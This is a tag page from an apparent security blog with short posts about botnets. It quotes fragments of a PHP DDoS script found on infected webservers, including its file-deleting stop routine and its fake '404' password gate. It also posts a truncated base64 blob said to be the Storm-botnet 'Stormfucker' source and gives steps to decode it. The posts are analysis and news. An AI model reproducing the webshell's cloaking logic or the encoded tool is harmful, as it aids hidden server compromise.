Posts Tagged ‘botnet’

DDoS PHP-Script

Tuesday, December 18th, 2012

Just recently the BSI warned about an ongoing attack to US Banks.
The php-script involved showed a “404” Error when called without any
arguments.

A closer looks shows a “404 Not Foun derror” WITH the typo in it.
Now we have a neat string to search for in google or wherever..
and bingo: some other victom already posted the source code
of the infected webserver:

 

Here we can see that a POST action “stop” makes the DDoS go away..


function stoped()
{
@unlink($base."stmdu.php");
@unlink($base."stp.hp");
cmdexec("killall ping;");
print "Stop & Clean";
}

And here is where the typo sits:


if(md5(md5(md5($_REQUEST['pass'])))!=$pass_up and $_SESSION['LoGiN']!=true)
{
print "404 Not Found

Not Found

The requested URL ".$_SERVER['PHP_SELF']." was not found on this server

Additionally, a 404 Not Foun derror was encountered while trying to use an Error Document to handle the request

";
die();
exit();
}

 

 

good website

Thursday, September 27th, 2012

Found an interesting website dealing with malware-analysis:

http://websiteanalystsresource.wordpress.com/

Seems like a good source for information.

Ghost Click: Botnet busted

Thursday, November 10th, 2011

The FBI announced the arrest of 6 estonian nationals for creating the worlds biggest botnet (DNSChanger) so far:
FBI Announcement

German magazin Heise made also an article about that:
Heise-Link

C&C – honeypot

Thursday, November 4th, 2010

Now the criminals run honeypots too:


http://blog.tllod.com/2010/11/03/statistics-dont-lie-or-do-they/

Don’t trust the admin interface of a Malware Control Server..:-)

own rbl started

Saturday, May 8th, 2010

I finally managed to create my own RBL (realtime blocklist) feeded by my honeypot.
All verified IPs which successfully attacked the honeypot are put into a database, which
provides a rbl for our MXes. The IPs are held for 24 hours except those which have more than 50
successful attacks within the last day. I was wondering if there were any mail-hits to be seen
at all; at least these are totally different attack vectors. But strangely enough I could see
blocked emails because of the entries made by the honeypot. We will see how well this
performs.

torpig powned

Tuesday, May 5th, 2009

According to a recent article on Heise some scientists have
taken over the torpig-botnet for 10 days. The original article an
be found here.

Stormfucker

Saturday, January 10th, 2009

Recently a team of scientists posted an article about dealing with the Storm – Botnet.
leder_at_informatik.uni-bonn.de posted some parts of the source-code “stormfucker” in the mailing-list “Full Dislosure”.
Here is the alpha code for Stormfucker. Patched a few things to not make
it work out of the box.

QlpoOTFBWSZTWZCbNyYBVlN/////////////////////////////////////////////4TAs912+
+94tbufA4+gD77BpzqdxS0zeLwUezfXsV0ddu49dtzvgHvsHnnnp3c5BjtTPM71fcjZuzwHo94vu
Dop5AABQAD77B7ym3y7vALrmz7Q8AVtsgAAeSc3PAd9j7469igoDHgOdgBQA+jR87AAADe5n0gvn...

If you want to work with this code, you need to undecrypt the source. Here is a version of
python:

1) save the source in a file
2) start python:
$ python
Python 2.5.1 (r251:54863, May 18 2007, 16:56:43)
[GCC 3.4.4 (cygming special, gdc 0.12, using dmd 0.125)] on cygwin
Type "help", "copyright", "credits" or "license" for more information.
>>> from base64 import *
>>> a=file("stf.txt",'r')
>>> b=a.read()
>>> c=b64decode(b)
>>> a=file("stf.out",'w')
>>> a.write(c)
>>> a.close()
^D

Now we have a stf.out - file, which is bzip2 compressed. (check with "file")
$ bzip2 -d stf.out
bzip2: Can't guess original name for stf.out -- using stf.out.out

Now we have tar-file.. lets have a look:

$ tar tvf stf.out.out
drwxr-xr-x tw/tw 0 2008-01-01 00:00 stormfucker/
-rw-r--r-- tw/tw 610 2008-01-01 00:00 stormfucker/routing.h
-rw-r--r-- tw/tw 75 2008-01-01 00:00 stormfucker/install.h
..

Extract with tar xvf and have phun..:)